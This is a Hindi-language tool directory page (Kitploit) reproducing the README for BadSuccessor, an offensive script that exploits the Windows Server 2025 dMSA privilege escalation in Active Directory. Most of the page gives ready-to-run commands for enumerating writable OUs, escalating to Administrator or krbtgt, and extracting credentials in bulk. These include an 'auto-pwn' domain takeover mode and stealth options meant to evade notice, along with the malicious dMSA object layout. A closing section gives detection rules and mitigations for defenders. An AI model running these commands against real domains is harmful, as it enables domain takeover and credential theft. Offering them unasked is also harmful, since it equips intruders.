Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
badsuccessor — Windows Server 2025 dMSA विशेषाधिकार वृद्धि भेद्यता का दोहन करके लिखने योग्य OU की सूची बनाता है, मनमाने डोमेन उपयोगकर्ताओं तक विशेषाधिकार बढ़ाता है, क्रेडेंशियल निकालता है, और अधिकृत AD सुरक्षा मूल्यांकनों में डोमेन टेकओवर सक्षम करता है। | Kitploit
उपकरण/GitHubGitHub/cybrly/badsuccessor
विशेषाधिकार वृद्धिटोहीस्थायित्व तंत्रशोषणपार्श्व आंदोलनजानकारी एकत्र करनापोस्ट-शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगप्रतिकूल हमला
GitHubcybrly/badsuccessor

badsuccessor

1222061 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Windows Server 2025 dMSA विशेषाधिकार वृद्धि भेद्यता का दोहन करके लिखने योग्य OU की सूची बनाता है, मनमाने डोमेन उपयोगकर्ताओं तक विशेषाधिकार बढ़ाता है, क्रेडेंशियल निकालता है, और अधिकृत AD सुरक्षा मूल्यांकनों में डोमेन टेकओवर सक्षम करता है।

रिपॉजिटरी देखें

BadSuccessor.py

एक पैठ परीक्षण उपकरण जो Windows Server 2025 Active Directory वातावरण में dMSA (प्रत्यायोजित प्रबंधित सेवा खाता) विशेषाधिकार वृद्धि भेद्यता का शोषण करता है।

⚠️ कानूनी अस्वीकरण

यह उपकरण केवल अधिकृत पैठ परीक्षण और सुरक्षा अनुसंधान उद्देश्यों के लिए है। स्पष्ट लिखित अनुमति के बिना सिस्टम के विरुद्ध इस उपकरण का उपयोग अवैध और अनैतिक है। लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।

⚠️ विकास स्थिति और पर्यावरणीय परीक्षण अस्वीकरण

महत्वपूर्ण: यह उपकरण सक्रिय विकास और परीक्षण के अधीन है।

वर्तमान स्थिति

  • Windows Server 2025 अपनाना: मई 2025 तक, Windows Server 2025 अभी भी प्रारंभिक अपनाने के चरण में है, जिसमें सीमित उत्पादन परिनियोजन हैं
  • पर्यावरणीय विविधताएँ: परीक्षण के लिए उपलब्ध Windows Server 2025 वातावरणों की सीमित संख्या के कारण, यह उपकरण अप्रयुक्त कॉन्फ़िगरेशन का सामना कर सकता है
  • निरंतर विकास: हम उपकरण को सक्रिय रूप से परिष्कृत कर रहे हैं क्योंकि अधिक पर्यावरणीय विविधताएँ परिनियोजित और परीक्षण की जाती हैं

इसका क्या अर्थ है

  • अपडेट की अपेक्षा करें: नए पर्यावरण प्रकारों के परीक्षण के रूप में उपकरण को लगातार अपडेट प्राप्त होंगे
  • मुद्दों की रिपोर्ट करें: आपकी प्रतिक्रिया महत्वपूर्ण है - कृपया किसी भी मुद्दे या किनारे के मामलों की रिपोर्ट करें जिनका आप सामना करते हैं
  • सावधानी से परीक्षण करें: पहले हमेशा गैर-उत्पादन वातावरण में परीक्षण करें
  • स्कीमा विविधताएँ: विभिन्न Windows Server 2025 बिल्ड dMSA विशेषताओं को अलग-अलग तरीके से लागू कर सकते हैं
  • फीचर स्थिरता: जबकि मुख्य कार्यक्षमता स्थिर है, कुछ सुविधाओं को विशिष्ट वातावरणों के लिए समायोजन की आवश्यकता हो सकती है

ट्रैक किए जा रहे ज्ञात चर

  • विभिन्न Windows Server 2025 बिल्ड संस्करण
  • स्कीमा विशेषता नामकरण परंपराएँ
  • क्षेत्रीय/स्थानीयकृत AD कार्यान्वयन
  • हाइब्रिड क्लाउड कॉन्फ़िगरेशन
  • विभिन्न AD कार्यात्मक स्तर
  • विभिन्न सुरक्षा हार्डनिंग कॉन्फ़िगरेशन

सामुदायिक परीक्षण

हम सुरक्षा समुदाय को प्रोत्साहित करते हैं:

  • विविध वातावरणों में परीक्षण करें
  • निष्कर्ष साझा करें (स्वच्छ)
  • संगतता सुधारों के लिए पुल अनुरोध सबमिट करें
  • पर्यावरणीय विविधताओं की रिपोर्ट करें

इस उपकरण का उपयोग करके, आप स्वीकार करते हैं कि यह सक्रिय विकास के अधीन है और आपके विशिष्ट वातावरण के लिए संशोधनों की आवश्यकता हो सकती है।

📋 अवलोकन

BadSuccessor Windows Server 2025 की प्रत्यायोजित प्रबंधित सेवा खाता (dMSA) सुविधा में विशेषाधिकार वृद्धि भेद्यता का शोषण करता है। यह भेद्यता न्यूनतम अनुमतियों वाले हमलावरों को डोमेन में किसी भी उपयोगकर्ता, जिसमें डोमेन व्यवस्थापक शामिल हैं, के लिए विशेषाधिकार बढ़ाने की अनुमति देती है।

अनुसंधान श्रेय

यह उपकरण Akamai Technologies से Yuval Gordon के उत्कृष्ट अनुसंधान पर आधारित है:

  • BadSuccessor: Abusing dMSA to Escalate Privileges in Active Directory

🎯 भेद्यता विवरण

यह भेद्यता dMSA प्रवासन प्रक्रिया में मौजूद है जहाँ:

  1. एक हमलावर किसी भी लिखने योग्य OU में एक दुर्भावनापूर्ण dMSA बनाता है
  2. msDS-ManagedAccountPrecededByLink या ms-DS-Managed-Account-Preceded-By-Link को लक्षित उपयोगकर्ता की ओर इंगित करने के लिए सेट करता है
  3. msDS-DelegatedMSAState या ms-DS-Delegated-MSA-State को 2 (प्रवासन पूर्ण) पर सेट करता है
  4. KDC स्वचालित रूप से PAC इनहेरिटेंस के माध्यम से dMSA को लक्षित उपयोगकर्ता के सभी विशेषाधिकार प्रदान करता है

इसके अतिरिक्त, KERB-DMSA-KEY-PACKAGE संरचना में लक्षित उपयोगकर्ता के पासवर्ड कुंजियाँ होती हैं, जिससे क्रेडेंशियल निष्कर्षण सक्षम होता है।

✅ पूर्वापेक्षाएँ

सिस्टम आवश्यकताएँ

  • Linux मशीन (डोमेन से जुड़ी नहीं)
  • Python 3.6+
  • लक्षित Active Directory वातावरण तक नेटवर्क पहुँच
  • लक्षित डोमेन में कम से कम एक Windows Server 2025 डोमेन नियंत्रक होना चाहिए

Python निर्भरताएँ```bash

pip3 install ldap3 pyasn1 pycryptodome pip3 install impacket==0.12.0

root@kitploit:~
**नोट**: इस टूल का परीक्षण impacket 0.12.0 के साथ किया गया है। संस्करण संगतता चेतावनियाँ रनटाइम पर प्रदर्शित की जाती हैं।

### वैकल्पिक निर्भरताएँ```bash
# For DNS discovery
pip3 install dnspython

# For enhanced Kerberos support (system packages)
# Ubuntu/Debian
sudo apt-get install libkrb5-dev libgssapi-krb5-2

# RHEL/CentOS/Fedora
sudo yum install krb5-devel

आवश्यक अनुमतियाँ

  • मान्य डोमेन क्रेडेंशियल (कोई भी उपयोगकर्ता खाता)
  • निम्नलिखित में से कोई भी अनुमति कम से कम एक संगठनात्मक इकाई पर:
    • CreateChild अनुमति
    • Write अनुमति
    • GenericWrite अनुमति
    • GenericAll अनुमति
    • लेखन पहुंच वाले डिफ़ॉल्ट समूहों के सदस्य (जैसे, Authenticated Users)
  • उपकरण स्वचालित रूप से सभी लिखने योग्य OU की खोज करता है और विशिष्ट अनुमतियाँ दिखाता है

🚀 स्थापना```bash

git clone https://github.com/cybrly/badsuccessor.git cd badsuccessor pip3 install -r requirements.txt chmod +x badsuccessor.py

root@kitploit:~
### requirements.txt```
ldap3>=2.9.1
pyasn1>=0.4.8
pycryptodome>=3.15.0
impacket==0.12.0
dnspython>=2.1.0

📖 उपयोग

मूल सिंटैक्स```bash

python3 badsuccessor.py -d -u -p [options]

root@kitploit:~
### त्वरित प्रारंभ उदाहरण

#### 1. ड्राई रन मोड (नया) - बिना परिवर्तन किए परीक्षण करें```bash
# Simulate attack to verify viability
python3 badsuccessor.py -d corp.local -u john -p Password123 --dry-run --target Administrator

# Dry run with specific OU
python3 badsuccessor.py -d corp.local -u john -p Password123 --dry-run --target Administrator --ou-dn "OU=ServiceAccounts,DC=corp,DC=local"

2. पर्यावरण सूचीबद्ध करें```bash

Check Windows Server 2025 schema support

python3 badsuccessor.py -d corp.local -u john -p Password123 --check-schema

Find ALL writable OUs with detailed permissions

python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate

List high-value targets

python3 badsuccessor.py -d corp.local -u john -p Password123 --list-targets

Validate specific target account

python3 badsuccessor.py -d corp.local -u john -p Password123 --validate-target Administrator

root@kitploit:~
#### 3. आक्रमण करें```bash
# Basic attack against Administrator
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target Administrator

# Stealth mode with innocuous naming
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target Administrator --stealth --random-delay 30

# Attack with custom dMSA attributes
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target krbtgt \
  --dmsa-name legit_service --dmsa-description "Legitimate Service Account" \
  --dmsa-display-name "Production Service"

# Attack with custom naming pattern
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target Administrator \
  --dmsa-pattern "svc{random}prod"

4. क्रेडेंशियल निकालें```bash

Extract credentials for multiple users

python3 badsuccessor.py -d corp.local -u john -p Password123 --extract-creds --targets Administrator,krbtgt,svc_sql

Auto-pwn mode (fully automated)

python3 badsuccessor.py -d corp.local -u john -p Password123 --auto-pwn

root@kitploit:~
#### 5. सत्र प्रबंधन (नया)```bash
# List all sessions
python3 badsuccessor.py -d corp.local -u john -p Password123 --list-sessions

# Resume a previous session
python3 badsuccessor.py -d corp.local -u john -p Password123 --session-id corp.local_john_1234567890_abcd1234

# Clean up all dMSAs from a session
python3 badsuccessor.py -d corp.local -u john -p Password123 --cleanup-session SESSION_ID

# Clean up all dMSAs from current session
python3 badsuccessor.py -d corp.local -u john -p Password123 --cleanup-all

6. परिणाम निर्यात करें (नया)```bash

Export enumeration results to JSON

python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate --export-json results.json

Export to CSV

python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate --export-csv writable_ous.csv

Generate HTML report

python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate --export-html report.html

Combined operation with exports

python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target Administrator
--export-json attack_results.json --export-html attack_report.html

root@kitploit:~
### कमांड लाइन विकल्प

#### प्रमाणीकरण तर्क
| विकल्प | विवरण |
|--------|-------------|
| `-d, --domain` | लक्ष्य डोमेन (जैसे, corp.local) **[आवश्यक]** |
| `-u, --username` | प्रमाणीकरण हेतु उपयोगकर्ता नाम **[आवश्यक]** |
| `-p, --password` | प्रमाणीकरण हेतु पासवर्ड |
| `--dc-ip` | डोमेन कंट्रोलर IP (छोड़े जाने पर स्वतः खोजें) |
| `--ldaps` | पोर्ट 636 पर LDAPS (SSL) कनेक्शन बाध्य करें |

#### आक्रमण मोड
| विकल्प | विवरण |
|--------|-------------|
| `--attack` | BadSuccessor आक्रमण करें |
| `--dry-run` | **नया**: बिना परिवर्तन किए आक्रमण का अनुकरण करें |
| `--extract-creds` | की पैकेज का उपयोग करके क्रेडेंशियल निकालें |
| `--auto-pwn` | पूर्ण रूप से स्वचालित डोमेन अधिग्रहण |

#### लक्ष्य विशिष्टता
| विकल्प | विवरण |
|--------|-------------|
| `--target` | वह लक्ष्य उपयोगकर्ता जिसके लिए विशेषाधिकार बढ़ाने हैं |
| `--targets` | क्रेडेंशियल निष्कर्षण हेतु उपयोगकर्ताओं की अल्पविराम-पृथक सूची |
| `--validate-target` | **नया**: आक्रमण किए बिना लक्ष्य खाते को मान्य करें |

#### dMSA कॉन्फ़िगरेशन
| विकल्प | विवरण |
|--------|-------------|
| `--dmsa-name` | दुर्भावनापूर्ण dMSA हेतु नाम (निर्दिष्ट न करने पर स्वतः उत्पन्न) |
| `--dmsa-pattern` | **नया**: dMSA नामकरण हेतु पैटर्न (जैसे, "svc{random}{target}") |
| `--ou-dn` | उपयोग हेतु विशिष्ट OU DN (निर्दिष्ट न करने पर स्वतः पहचान) |
| `--dmsa-description` | **नया**: निर्मित dMSA हेतु विवरण |
| `--dmsa-display-name` | **नया**: निर्मित dMSA हेतु प्रदर्शन नाम |

#### गणना विकल्प
| विकल्प | विवरण |
|--------|-------------|
| `--enumerate` | किसी भी लेखन अनुमति वाले OU की गणना करें |
| `--list-targets` | उच्च-मूल्य वाले लक्ष्यों की सूची दिखाएं |
| `--check-schema` | Windows Server 2025 स्कीमा सत्यापित करें |

#### सत्र प्रबंधन (नया)
| विकल्प | विवरण |
|--------|-------------|
| `--session-id` | मौजूदा सत्र फिर से शुरू करें |
| `--list-sessions` | सभी उपलब्ध सत्रों की सूची दिखाएं |
| `--cleanup-session SESSION_ID` | किसी सत्र से सभी dMSA साफ़ करें |

#### सफाई विकल्प
| विकल्प | विवरण |
|--------|-------------|
| `--cleanup` | निर्मित dMSA हटाएं |
| `--dmsa-dn` | सफाई कार्यों हेतु dMSA DN |
| `--cleanup-all` | **नया**: वर्तमान सत्र से सभी dMSA साफ़ करें |

#### आउटपुट विकल्प
| विकल्प | विवरण |
|--------|-------------|
| `--export-json FILE` | **नया**: परिणामों को JSON फ़ाइल में निर्यात करें |
| `--export-csv FILE` | **नया**: परिणामों को CSV फ़ाइल में निर्यात करें |
| `--export-html FILE` | **नया**: HTML रिपोर्ट तैयार करें |
| `--no-banner` | बैनर आउटपुट दबाएं |
| `--verbose` | विस्तृत आउटपुट सक्षम करें |

#### स्टील्थ विकल्प (नया)
| विकल्प | विवरण |
|--------|-------------|
| `--stealth` | स्टील्थ मोड सक्षम करें (हानिरहित नामकरण) |
| `--random-delay SECONDS` | संचालनों के बीच यादृच्छिक विलंब (0-N सेकंड) |

## 🔧 आक्रमण कार्यप्रवाह

### चरण 1: टोही
1. **स्कीमा सत्यापन**: गतिशील विशेषता पहचान के साथ Windows Server 2025 dMSA समर्थन की पुष्टि करता है
2. **अनुमति खोज**: किसी भी लेखन पहुँच वाले OU की पहचान करता है (सिर्फ CreateChild नहीं)
3. **लक्ष्य सत्यापन**: **नया** - आक्रमण से पहले व्यापक लक्ष्य खाता विश्लेषण

### चरण 2: शोषण
1. **ड्राई रन विकल्प**: **नया** - बिना परिवर्तन किए आक्रमण की व्यवहार्यता का परीक्षण करें
2. **dMSA निर्माण**: अनुकूलन योग्य विशेषताओं के साथ दुर्भावनापूर्ण dMSA बनाता है
3. **विशेषता हेरफेर**: स्कीमा जागरूकता के साथ पूर्ववर्ती लिंक और माइग्रेशन स्थिति सेट करता है
4. **सत्र ट्रैकिंग**: **नया** - आसान सफाई हेतु सभी निर्मित ऑब्जेक्ट ट्रैक किए जाते हैं

### चरण 3: प्रमाणीकरण
1. **Kerberos TGT अनुरोध**: विरासत में मिले विशेषाधिकारों के साथ TGT प्राप्त करता है
2. **PAC विश्लेषण**: विरासत में मिली समूह सदस्यताओं को सत्यापित करता है
3. **की पैकेज निष्कर्षण**: एकाधिक फ़ॉलबैक विधियों के साथ उन्नत पार्सिंग

### चरण 4: पोस्ट-शोषण
यह टूल उपयोग-हेतु-तैयार कमांड प्रदान करता है:
- DCSync आक्रमण (सभी डोमेन हैश डंप करें)
- रिमोट कमांड निष्पादन
- पार्श्विक गतिविधि
- स्थायित्व स्थापना

## 🔐 प्रोडक्शन-तैयार विशेषताएँ (v3.0.0)

### गतिशील स्कीमा पहचान (नया)
- स्वचालित रूप से पता लगाता है कि आपका वातावरण किस विशेषता नामकरण परंपरा का उपयोग करता है
- dMSA विशेषताओं के सभी ज्ञात रूपों का समर्थन करता है
- विभिन्न Windows Server 2025 बिल्ड हेतु फ़ॉलबैक तंत्र

### उन्नत लक्ष्य सत्यापन (नया)
- आक्रमण-पूर्व लक्ष्य खातों का सत्यापन
- अक्षम, लॉक या समाप्त खातों का पता लगाता है
- स्मार्टकार्ड आवश्यकताओं और प्रत्यायोजन प्रतिबंधों के बारे में चेतावनी देता है
- लक्ष्य गुणों के आधार पर अनुशंसाएँ प्रदान करता है

### सत्र प्रबंधन (नया)
- संचालनों में स्थायी सत्र ट्रैकिंग
- बाधित आक्रमण फिर से शुरू करें
- सभी निर्मित dMSA की थोक सफाई
- सत्र फ़ाइलें 0700 अनुमतियों के साथ सुरक्षित रूप से संग्रहीत

### ड्राई रन मोड (नया)
- बिना कोई परिवर्तन किए आक्रमण की व्यवहार्यता का परीक्षण करें
- स्कीमा, अनुमतियों और लक्ष्य को मान्य करता है
- रिपोर्ट करता है कि वास्तविक आक्रमण के दौरान वास्तव में क्या होगा
- टोही और योजना हेतु उत्तम

### स्टील्थ विशेषताएँ (नया)
- हानिरहित dMSA नामकरण पैटर्न जो घुलमिल जाते हैं
- संचालनों के बीच यादृच्छिक विलंब
- अनुकूलन योग्य dMSA विशेषताएँ (विवरण, प्रदर्शन नाम)
- चर के साथ पैटर्न-आधारित नामकरण

### व्यावसायिक आउटपुट प्रारूप (नया)
- अन्य टूल के साथ एकीकरण हेतु JSON निर्यात
- स्प्रेडशीट विश्लेषण हेतु CSV निर्यात
- स्टाइलिश आउटपुट के साथ HTML रिपोर्ट
- सभी संचालनों हेतु संरचित डेटा

### एंटरप्राइज़-ग्रेड त्रुटि प्रबंधन
- कार्यान्वयन योग्य समाधानों के साथ व्यापक त्रुटि संदेश
- सभी संचालनों हेतु सुचारू फ़ॉलबैक
- टाइमस्टैम्प और गंभीरता के साथ विस्तृत लॉगिंग
- समस्या निवारण हेतु वर्बोज़ मोड

### पूर्ण कार्यान्वयन
- सभी विशेषताएँ पूर्ण रूप से कार्यान्वित (कोई प्लेसहोल्डर कोड नहीं)
- प्रोडक्शन-परीक्षित कोड संरचना
- विशेषज्ञ कक्षाओं के साथ मॉड्यूलर डिज़ाइन
- विभिन्न AD कॉन्फ़िगरेशन के साथ पूर्ण संगतता

## 🛡️ पहचान

### निगरानी हेतु इवेंट ID
| इवेंट ID | स्रोत | विवरण |
|----------|--------|-------------|
| **5137** | सुरक्षा | निर्देशिका सेवा ऑब्जेक्ट निर्माण (dMSA) |
| **5136** | सुरक्षा | निर्देशिका सेवा ऑब्जेक्ट संशोधन |
| **2946** | निर्देशिका सेवा | समूह प्रबंधित सेवा खाता प्रमाणीकरण |
| **4768** | सुरक्षा | Kerberos TGT अनुरोधित |
| **4769** | सुरक्षा | Kerberos सेवा टिकट अनुरोधित |

### पहचान नियम```
# Splunk Query Example
index=windows EventCode=5137
| where ObjectClass="msDS-DelegatedManagedServiceAccount" OR ObjectClass="ms-DS-Delegated-Managed-Service-Account"
| where NOT user IN ("approved_admins")

# Sigma Rule Example
detection:
  selection:
    EventID: 5136
    AttributeLDAPDisplayName:
      - 'msDS-ManagedAccountPrecededByLink'
      - 'ms-DS-Managed-Account-Preceded-By-Link'
  condition: selection

Behavioral Indicators

  • सेवा खातों का तेजी से निर्माण और विलोपन
  • गैर-प्रशासनिक उपयोगकर्ताओं द्वारा dMSAs बनाना
  • माइग्रेशन से संबंधित विशेषताओं में असामान्य संशोधन
  • अप्रत्याशित स्रोतों से प्रमाणीकरण करने वाले सेवा खाते
  • संदिग्ध नामकरण पैटर्न वाले dMSAs

🔒 शमन

तत्काल कार्रवाई

  1. OU अनुमतियाँ प्रतिबंधित करें ```powershell

    Remove ALL write permissions from non-admin users

    Remove-ADPermission -Identity "OU=ServiceAccounts,DC=corp,DC=local" -User "Domain Users" -AccessRights CreateChild,Write,GenericWrite,GenericAll

    Check for default group permissions

    Get-ADPermission -Identity "OU=ServiceAccounts,DC=corp,DC=local" | Where-Object {$_.IdentityReference -match "Authenticated Users|Everyone"}

    root@kitploit:~
  2. dMSA संचालन की निगरानी करें ```powershell

    Enable auditing on dMSA attributes (both naming conventions)

    Set-ADObject -Identity "CN=Schema,CN=Configuration,DC=corp,DC=local" -Add @{ 'msDS-ReplAttributeMetaData' = @('msDS-ManagedAccountPrecededByLink', 'ms-DS-Managed-Account-Preceded-By-Link') }

    root@kitploit:~
  3. डिटेक्शन लागू करें

    • प्रदान किए गए डिटेक्शन नियमों को तैनात करें
    • S-1-5-7 कॉलर के साथ Event ID 2946 पर अलर्ट करें
    • विशेषता संशोधनों की निगरानी करें
    • dMSA निर्माण पैटर्न ट्रैक करें

दीर्घकालिक समाधान

  • उपलब्ध होने पर Microsoft पैच लागू करें
  • नियमित अनुमति ऑडिट (सभी लेखन अनुमतियों की जाँच करें, केवल CreateChild नहीं)
  • न्यूनतम विशेषाधिकार सिद्धांत का प्रवर्तन
  • यदि आवश्यक न हो तो dMSA अक्षम करने पर विचार करें
  • सेवा खाता निर्माण के लिए अनुमोदन कार्यप्रवाह लागू करें

📊 आँकड़े

Akamai के शोध के आधार पर:

  • 91% वातावरणों में कमजोर अनुमतियाँ हैं
  • डिफ़ॉल्ट कॉन्फ़िगरेशन पर काम करता है
  • Windows Server 2025 DC वाले संगठनों को प्रभावित करता है
  • वर्तमान में कोई पैच उपलब्ध नहीं है

🏗️ तकनीकी कार्यान्वयन विवरण

dMSA ऑब्जेक्ट संरचना```ldif

dn: CN=evil_dmsa,OU=ServiceAccounts,DC=corp,DC=local objectClass: top objectClass: msDS-GroupManagedServiceAccount objectClass: msDS-DelegatedManagedServiceAccount sAMAccountName: evil_dmsa$ userAccountControl: 4096

Note: Your environment may use either format below

msDS-ManagedAccountPrecededByLink: CN=Administrator,CN=Users,DC=corp,DC=local

OR

ms-DS-Managed-Account-Preceded-By-Link: CN=Administrator,CN=Users,DC=corp,DC=local msDS-DelegatedMSAState: 2 msDS-SupportedEncryptionTypes: 28

root@kitploit:~
### मुख्य पैकेज संरचना
KERB-DMSA-KEY-PACKAGE में शामिल है:
- वर्तमान कुंजियाँ: dMSA की एन्क्रिप्शन कुंजियाँ
- पिछली कुंजियाँ: लक्षित उपयोगकर्ता की एन्क्रिप्शन कुंजियाँ (NTLM हैश सहित)
- पासवर्ड क्रैकिंग के बिना सीधे क्रेडेंशियल निष्कर्षण सक्षम करता है

## 🤝 योगदान

योगदान का स्वागत है! कृपया:
1. रिपॉजिटरी को फोर्क करें
2. फीचर ब्रांच बनाएं (`git checkout -b feature/enhancement`)
3. परिवर्तन कमिट करें (`git commit -m 'Add new feature'`)
4. ब्रांच पर पुश करें (`git push origin feature/enhancement`)
5. पुल रिक्वेस्ट सबमिट करें

### विकास दिशानिर्देश
- PEP 8 स्टाइल गाइड का पालन करें
- नई सुविधाओं के लिए यूनिट टेस्ट जोड़ें
- दस्तावेज़ीकरण अपडेट करें
- कई AD वातावरणों के विरुद्ध परीक्षण करें
- विभिन्न स्कीमा विशेषता नामकरण परंपराओं के साथ परीक्षण करें
- सुनिश्चित करें कि सभी सुविधाएँ उत्पादन-तैयार हैं (कोई प्लेसहोल्डर नहीं)

## 📝 परिवर्तन लॉग

### v2.3.0 (2025-05-28) - उत्पादन-तैयार रिलीज़
- **नया**: सुरक्षित हमले के अनुकरण के लिए ड्राई रन मोड
- **नया**: स्टेट पर्सिस्टेंस के साथ व्यापक सत्र प्रबंधन
- **नया**: विस्तृत विश्लेषण के साथ लक्ष्य खाता सत्यापन
- **नया**: निर्यात क्षमताएँ (JSON, CSV, HTML)
- **नया**: हानिरहित नामकरण पैटर्न के साथ स्टील्थ मोड
- **नया**: अनुकूलन योग्य dMSA विशेषताएँ (विवरण, प्रदर्शन नाम)
- **नया**: चर के साथ पैटर्न-आधारित dMSA नामकरण
- **नया**: स्टील्थ कार्यों के लिए यादृच्छिक विलंब समर्थन
- **नया**: गतिशील स्कीमा विशेषता पहचान
- **नया**: फॉलबैक के साथ बेहतर कुंजी पैकेज पार्सिंग
- **नया**: बल्क क्लीनअप ऑपरेशन
- **नया**: पेशेवर त्रुटि हैंडलिंग और लॉगिंग
- **सुधार**: पूर्ण मॉड्यूलर आर्किटेक्चर
- **सुधार**: निर्भरताओं के लिए संस्करण जाँच
- **ठीक किया गया**: सभी प्लेसहोल्डर कोड को पूर्ण कार्यान्वयन से बदल दिया गया

### v2.2.0 (2025-05-27) - संगतता अद्यतन
- **ठीक किया गया**: impacket आयात समस्याएँ हल की गईं (seq_decode निर्भरता हटाई गई)
- **ठीक किया गया**: impacket 0.12.0 के साथ संगत
- **सुविधा**: दोनों dMSA विशेषता नामकरण परंपराओं के लिए समर्थन जोड़ा गया
- **सुधार**: आयात विफलताओं के लिए बेहतर त्रुटि हैंडलिंग
- **सुधार**: अधिक मजबूत स्कीमा पहचान

### v2.1.0 (2025-05-25) - पूर्ण कार्यान्वयन
- **मुख्य**: बेहतर ACL अनुमति जाँच - अब सभी लेखन अनुमतियों का पता लगाता है
- **मुख्य**: डिफ़ॉल्ट समूहों के लिए समर्थन जोड़ा गया (Authenticated Users, Everyone, आदि)
- **ठीक किया गया**: सभी प्लेसहोल्डर कोड हटाए गए
- **ठीक किया गया**: सभी सुविधाओं का पूर्ण कार्यान्वयन
- **सुधार**: बेहतर त्रुटि हैंडलिंग और सूचनात्मक आउटपुट
- **सुधार**: अधिक व्यापक OU गणना (कंटेनर शामिल हैं)
- **सुविधा**: खोजे गए प्रत्येक OU के लिए सटीक अनुमतियाँ दिखाता है
- **सुविधा**: सुरक्षित उपयोगकर्ताओं और प्रत्यायोजन प्रतिबंधों का पता लगाता है

### v2.0.0 (2025-05-24) - उन्नत संस्करण
- **मुख्य**: पूर्ण Kerberos प्रमाणीकरण कार्यान्वयन
- **मुख्य**: क्रेडेंशियल चोरी के लिए KERB-DMSA-KEY-PACKAGE निष्कर्षण
- **मुख्य**: बुनियादी ACL अनुमति जाँच
- **मुख्य**: Windows Server 2025 स्कीमा सत्यापन
- **सुविधा**: बड़े पैमाने पर क्रेडेंशियल निष्कर्षण मोड
- **सुविधा**: स्वचालित डोमेन अधिग्रहण के लिए ऑटो-प्यून
- **सुविधा**: बेहतर लक्ष्य गणना
- **सुविधा**: पोस्ट-एक्सप्लॉइटेशन कमांड जनरेशन
- **सुधार**: बेहतर त्रुटि हैंडलिंग और लॉगिंग
- **सुधार**: उत्पादन-तैयार कोड संरचना

## 📚 संदर्भ

- [मूल अकामाई अनुसंधान](https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory)
- [GitHub मुद्दा #1 - बेहतर अनुमति जाँच](https://github.com/cybrly/badsuccessor/issues/1)
- [GitHub मुद्दा #2 - स्कीमा विशेषता नामकरण](https://github.com/cybrly/badsuccessor/issues/2)
- [Microsoft सुरक्षा प्रतिक्रिया केंद्र](https://msrc.microsoft.com/)

## 🐛 ज्ञात समस्याएँ

- कुछ वातावरण विभिन्न विशेषता नामकरण परंपराओं का उपयोग कर सकते हैं (गतिशील पहचान द्वारा संभाला जाता है)
- हैश प्रमाणीकरण के लिए प्रारंभिक कार्यान्वयन में पासवर्ड आवश्यक है
- कुछ वातावरणों में मैनुअल Kerberos कॉन्फ़िगरेशन आवश्यक हो सकता है
- पहचान नियमों को प्रति वातावरण अनुकूलन की आवश्यकता होती है

## 🔍 समस्या निवारण

### आयात त्रुटियाँ

यदि आपको impacket के साथ आयात त्रुटियाँ मिलती हैं:```bash
# Ensure you have the correct version
pip3 uninstall impacket
pip3 install impacket==0.12.0

# Check version
python3 -c "import impacket; print(impacket.__version__)"

स्कीमा डिटेक्शन विफलताएँ

टूल में अब डायनामिक स्कीमा डिटेक्शन शामिल है। यदि यह अभी भी विफल रहता है:```powershell

On Domain Controller - Check actual attribute names

Get-ADObject -Filter {name -like "delegated" -or name -like "preceded"} -SearchBase "CN=Schema,CN=Configuration,DC=corp,DC=local" | Select Name

root@kitploit:~
### अनुमति अस्वीकृत त्रुटियाँ

परीक्षण के लिए नए dry-run मोड का उपयोग करें:```bash
# Test without making changes
python3 badsuccessor.py -d corp.local -u john -p Password123 --dry-run --target Administrator

# Check your exact permissions
python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate --verbose

सत्र समस्याएँ```bash

List sessions

python3 badsuccessor.py -d corp.local -u john -p Password123 --list-sessions

Clean up stale sessions

rm -rf /tmp/.badsuccessor_sessions/

root@kitploit:~
## 📧 संपर्क

प्रश्नों, समस्याओं, या जिम्मेदार प्रकटीकरण के लिए:
- GitHub Issue खोलें
- जिम्मेदार प्रकटीकरण प्रथाओं का पालन करें
- पैच विकास के लिए 90 दिन का समय दें

---

**⚡ याद रखें: अधिक शक्ति के साथ अधिक जिम्मेदारी आती है। परीक्षण से पहले हमेशा उचित प्राधिकरण प्राप्त करें!** 🔐
टूल डाउनलोड करें